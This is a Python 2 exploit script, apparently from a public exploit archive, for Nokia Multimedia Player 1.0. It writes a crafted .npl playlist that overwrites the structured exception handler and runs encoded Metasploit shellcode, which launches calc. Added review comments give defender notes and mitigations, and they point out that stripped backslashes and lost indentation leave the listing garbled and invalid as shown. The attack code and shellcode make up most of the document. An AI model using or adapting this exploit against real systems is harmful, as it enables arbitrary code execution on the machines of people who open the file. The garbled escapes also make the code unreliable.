# Title : Nokia Multimedia Player 1.0 (playlist) Universal SEH Overwrite Exploit
# Published : 2009-03-09
# Author : His0k4
#usage: exploit.py
# Banner only: Python 2 print statements that name the affected product
# (Nokia Multimedia Player 1.0, playlist handling), the people credited, and
# the single platform the author reports testing on (Windows XP Pro SP2; the
# "Fr" suffix presumably means the French edition - confirm).
# NOTE(review): the stray trailing "n" in several strings looks like a "\n"
# whose backslash was lost when this page was extracted - confirm against the
# original advisory text.
print "**************************************************************************"
print " Nokia Multimedia Player 1.0 (playlist) Universal Seh Overwrite Exploitn"
print " Founder : 0in"
print " Exploited by : His0k4"
print " Tested on: Windows XP Pro SP2 Frn"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)n"
print "**************************************************************************"
# Contents of the crafted playlist, in the order they are concatenated on the
# last line of this block: filler, a 4-byte value named next_seh, a 4-byte
# value named seh, a short pad, then the payload. The variable names and the
# page title indicate a stack overflow that reaches a structured-exception-
# handler record. The filler length (1880) is the author's figure for the
# tested build; the page does not say how it was derived.
# NOTE(review): every "xNN" below appears to be a "\xNN" escape whose backslash
# was stripped by the page extraction; as printed these are plain ASCII
# characters, not the byte values the author intended.
# Defender notes: a .npl playlist of roughly 2 KB that is one long run of a
# repeated byte followed by non-text data is not a legitimate playlist, which
# makes it a reasonable file-scanning signature. This bug class is blunted by
# SafeSEH/SEHOP, DEP and ASLR on the loaded modules. The page lists no fixed
# version, so removing or isolating the player is the dependable mitigation.
buff = "x41" * 1880
next_seh = "xEBx06x41x41"
nops = "x90"*19
# The author calls this handler value "universal"; presumably it points into a
# module that ships with the application rather than an OS DLL, which would
# mean the OS service-pack level alone is not a protection - the page does not
# name the module, TODO confirm.
seh = "x0ExD2x8Ex01" #yes universal :D
# Per the generator comment below, the payload is a Metasploit-produced,
# Alpha2-encoded command-execution stub configured with CMD=calc, i.e. a
# visible proof of execution. For risk rating, treat the underlying flaw as
# arbitrary code execution with the privileges of the user opening the file.
# win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
shellcode = (
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x48x49x51x5ax6ax67"
"x58x50x30x42x30x42x6bx42x41x77x41x42x32x42x41x32"
"x41x41x30x41x41x58x38x42x42x50x75x6bx59x79x6cx6b"
"x58x37x34x53x30x35x50x53x30x6cx4bx41x55x47x4cx6c"
"x4bx51x6cx63x35x54x38x77x71x7ax4fx6ex6bx70x4fx74"
"x58x4ex6bx43x6fx37x50x43x31x5ax4bx47x39x4ex6bx37"
"x44x6cx4bx45x51x58x6ex37x41x6bx70x6cx59x6cx6cx4f"
"x74x6fx30x62x54x47x77x6bx71x59x5ax76x6dx74x41x6b"
"x72x58x6bx69x64x65x6bx41x44x47x54x34x44x44x35x38"
"x65x6ex6bx33x6fx31x34x37x71x6ax4bx51x76x6ex6bx44"
"x4cx42x6bx6ex6bx43x6fx57x6cx55x51x6ax4bx4cx4bx47"
"x6cx4ex6bx75x51x4ax4bx4ex69x31x4cx66x44x37x74x4f"
"x33x55x61x4fx30x30x64x6ex6bx77x30x36x50x4ex65x39"
"x50x31x68x64x4cx6cx4bx73x70x36x6cx6ex6bx30x70x37"
"x6cx6cx6dx4ex6bx45x38x45x58x58x6bx73x39x6ex6bx4b"
"x30x4ex50x75x50x73x30x63x30x6cx4bx45x38x65x6cx31"
"x4fx30x31x4cx36x75x30x32x76x6dx59x59x68x6cx43x4b"
"x70x41x6bx46x30x45x38x48x70x4ex6ax65x54x43x6fx71"
"x78x4fx68x59x6ex4cx4ax76x6ex52x77x6bx4fx6bx57x72"
"x43x53x51x30x6cx52x43x77x70x67"
)
# Note that seh precedes nops here even though nops is defined first above.
exploit = buff + next_seh + seh + nops + shellcode
# Writes the assembled string to "nokia.npl" in the current working directory
# and prints a one-line success or failure message.
# NOTE(review): the try/except bodies have lost their indentation in this copy
# of the page, so the listing is not valid Python as shown.
# NOTE(review): the bare except reports every failure (including
# KeyboardInterrupt under Python 2) as a generic "Error", and the file handle
# is not closed if write() raises, because close() is called manually rather
# than through a with-block.
try:
out_file = open("nokia.npl",'w')
out_file.write(exploit)
out_file.close()
print "Exploit file created!n"
except:
print "Error"